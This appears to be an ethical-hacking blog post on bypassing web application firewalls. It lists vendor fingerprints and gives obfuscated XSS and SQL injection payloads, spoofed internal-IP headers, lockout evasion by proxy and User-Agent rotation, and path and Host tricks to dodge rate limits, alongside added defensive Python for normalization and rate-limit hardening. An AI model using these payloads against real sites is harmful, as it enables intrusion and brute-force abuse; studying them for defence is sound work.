Unique WAF Bypassing Methods
What is a WAF?
A web application firewall (WAF) is a firewall that monitors, filters, and blocks data packets as they travel to and from a website or web application.
A WAF can be either network-based, host-based, or cloud-based and is often deployed through a reverse proxy and placed in front of one or more websites or applications.
How a WAF actually works
A WAF analyzes Hypertext Transfer Protocol (HTTP) requests and applies a set of rules that define what parts of that conversation are benign and what parts are malicious. The main parts of HTTP conversations that a WAF analyzes are GET and POST requests. GET requests are used to retrieve data from the server, and POST requests are used to send data to a server to change its state.
The typical working style of a WAF
Whitelisting, blacklisting, or hybrid security, which uses both of the above as rules.
Vendors for WAF:
AWS, Cloudflare, Akamai, Imperva, Verizon [EdgeCast], Sucuri and many more.
Typical responses that reveal each WAF:
AWS WAF: awselb/2.0, AWSALB cookie values, and sometimes custom responses
CloudFront: Generated by CloudFront (CloudFront)
Cloudflare: CLOUDFLARE_ERROR_500S_BOX
Akamai: AkamaiGHost
Imperva: Powered By Incapsula
Sucuri: Sucuri, X-Sucuri-ID, Access Denied - Sucuri Website Firewall
Verizon [EdgeCast]: Please contact the site administrator, and provide the following Reference ID: EdgeCast Web Application Firewall (Verizon)
F5 ASM: The requested URL was rejected.
ModSecurity: This error was generated by Mod_Security
NetScaler: NS-Cache
Nexusguard: speresources.nexusguard.com/wafpage/index.html
Palo Alto: the text snippet "Palo Alto Next-Generation Security Platform"
SonicWall: This request is blocked by the SonicWALL.
Sophos: Powered by UTM Web Protection
ZenEdge: X-Zen-Fury header
A few facts about WAFs
WAFs use common ports such as 80, 443, 8008, 8080 and 8088.
WAFs create their own cookies during a session.
WAFs reveal their presence in the response headers.
WAFs do not give complete protection against DoS and DDoS attacks.
WAFs can respond with unique response codes and descriptive error pages.
WAFs are easily identifiable with simple network mappers and tools such as traceroute, Nmap and curl, and from response headers and banners.
Unique methods to bypass WAF security
When you are on a login page.
Blocked reason:
The WAF blocks you as an intruder [account lockout, brute forcing] at
/v1/auth/login
Bypassing method:
Use random User-Agents, ranging from desktop Chrome to phone browsers.
Use proxy chains, since there is a real chance that your IP gets blocked.
Use slight changes in the API path, such as /v2/auth/login.
Try case variations in the path, such as /V1/auth/login.
While checking for SQL injection:
Blocked reason:
union select user, password from users
Bypassing method:
|| (select user from users where user_id = 1) = 'admin'
While working on XSS:
Blocked reason:
<script>alert(1)</script>
SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
Bypassing method:
<ScRipT>alert()</sCRipT>
sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'
While working with URL encoding:
Encode normal payloads with percent encoding (URL encoding).
Blocked reason:
1. <svG/x=">"/oNloaD=confirm()//
2. uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)
Bypassing Method:
1. %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F
2. uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29
While checking with comments:
Comments obfuscate standard payload vectors.
Blocked reason:
1. <script>alert()</script>
2. /?id=1+union+select+1,2,3 --
3. <a href=javascript:alert()>ClickMe
Bypassing method:
1. <!--><script>alert/**/()/**/</script>
2. /?id=1+un/**/ion+sel/**/ect+1,2,3 --
3. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
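The three sections above (case variation, URL encoding, inline comments) all defeat a rule engine that matches raw bytes, and all fail against one that canonicalizes first. The Python below is an added illustration, not code from the original post: a toy rule engine with a constructed signature list (not any vendor's rule set) that normalizes a parameter and then checks the post's own payload variants.

```python
import re
from urllib.parse import unquote_plus

# Constructed toy signatures modelled on the blocked forms in this post;
# real WAF rule sets are far larger.
SIGNATURES = [
    re.compile(r"union\s*\(?\s*select"),   # UNION SELECT, with or without a paren
    re.compile(r"select\s.*\sfrom\s"),     # SELECT ... FROM ...
    re.compile(r"<script"),                # script tag
    re.compile(r"on[a-z]+\s*="),           # inline event handler such as onload=
    re.compile(r"javascript:"),            # javascript: URL scheme
]


def normalize(payload: str, max_decode_rounds: int = 3) -> str:
    """Canonicalize a request parameter before any rule is applied."""
    text = payload
    # Bounded repeated URL decoding: catches single and double percent
    # encoding without looping forever on adversarial input.
    for _ in range(max_decode_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = text.lower()                                  # case variation
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)    # inline /**/ comments
    return re.sub(r"\s+", " ", text)                     # collapse whitespace


def is_blocked(payload: str, normalize_first: bool = True) -> bool:
    """True if any signature fires. With normalize_first=False this behaves like
    a naive engine matching raw bytes, which the post's variants slip past."""
    text = normalize(payload) if normalize_first else payload
    return any(sig.search(text) for sig in SIGNATURES)


if __name__ == "__main__":
    for variant in (
        "<ScRipT>alert()</sCRipT>",
        "%3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F",
        "uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29",
        "/?id=1+un/**/ion+sel/**/ect+1,2,3 --",
    ):
        print(f"raw={is_blocked(variant, False)!s:5} "
              f"normalized={is_blocked(variant)!s:5} {variant}")
```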
While working on request header spoofing:
Our target is to fool the WAF/server into believing the request came from their internal network. Adding spoofed headers that represent the internal network does the trick. The following set of headers is added to each request, thus spoofing the origin.
The upstream proxy/WAF misinterprets the request as coming from its internal network and lets our gory payload through.
Bypassing Method:
1. X-Originating-IP: 127.0.0.1
2. X-Forwarded-For: 127.0.0.1
3. X-Remote-IP: 127.0.0.1
4. X-Remote-Addr: 127.0.0.1
5. X-Client-IP: 127.0.0.1
While checking for rate limits:
Blocked reason:
The attacker is able to send 5000 requests within 10 minutes; after 5000+ requests, further requests should be forbidden [403].
GET/POST/DELETE /v3/admin/add_data/122
Host: example.com
Bypassing methods:
1. GET/POST/DELETE /../../../../../../v3/admin/add_data/122
Host: example.com
2. GET/POST/DELETE /v3/admin/add_data/122/../../../../../../../
Host: example.com
3. GET/POST/DELETE /v3/admin/add_data/122
Host: TAMPERED.example.com
4. GET/POST/DELETE /v3/admin/add_data/122
Host: example.com
X-Forwarded-Host: 127.0.0.1
5. GET/POST/DELETE /v3/admin/add_data/122
(remove all the request headers and send)
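The countermeasure to the spoofed-origin headers and to the rate-limit (and login-lockout) bypasses above is the same on the proxy side: take the client address only from hops your own proxies appended, reject a Host that is not on the allow-list instead of giving it a fresh bucket, and key the limiter on the canonical path. The Python below is an added example, not the post's own code; the trusted proxy range, hostnames and sample addresses are constructed for the illustration.

```python
import ipaddress
from posixpath import normpath

# Constructed configuration for this example: the address range of our own
# reverse proxies/WAF and the hostnames the application is really served under.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]
ALLOWED_HOSTS = {"example.com", "www.example.com"}

# Client-supplied headers that must never drive origin or routing decisions.
SPOOFABLE = {"x-originating-ip", "x-forwarded-for", "x-remote-ip",
             "x-remote-addr", "x-client-ip", "x-forwarded-host"}


def client_ip(remote_addr, xff):
    """Walk X-Forwarded-For from the right, skipping our trusted proxies; the
    first untrusted hop is the client. If the socket peer itself is untrusted,
    the header was never set by us and is ignored entirely."""
    hops = [h.strip() for h in xff.split(",") if h.strip()] + [remote_addr]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return remote_addr          # junk in the chain: trust only the peer
        if not any(addr in net for net in TRUSTED_PROXIES):
            return str(addr)
    return remote_addr                  # every hop was ours (internal traffic)


def canonical_path(raw_path):
    """Resolve ../ segments before the limiter sees the path, so the limiter
    and the router agree on which endpoint is being hit."""
    return normpath("/" + raw_path.split("?", 1)[0].lstrip("/"))


def rate_limit_key(remote_addr, headers, raw_path):
    """Key a limiter should count on. Returns None when the request must be
    rejected outright (unknown or missing Host) rather than given a new bucket.
    The HTTP verb is deliberately not part of the key."""
    h = {k.lower(): v for k, v in headers.items()}
    host = h.get("host", "").split(":", 1)[0].lower()
    if host not in ALLOWED_HOSTS:
        return None
    return (client_ip(remote_addr, h.get("x-forwarded-for", "")),
            host, canonical_path(raw_path))


def scrub_headers(remote_addr, headers):
    """Drop client-controlled origin headers and re-add the address we derived."""
    clean = {k: v for k, v in headers.items() if k.lower() not in SPOOFABLE}
    xff = next((v for k, v in headers.items() if k.lower() == "x-forwarded-for"), "")
    clean["X-Forwarded-For"] = client_ip(remote_addr, xff)
    return clean
```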
Suggestions are most welcome. Please write a mail to Akash.venky091@gmail.com. You can also follow me here for more updates on security and ethical hacking: Akash Venky,
or contact me at https://www.linkedin.com/in/akash-h-c-4a4090a7/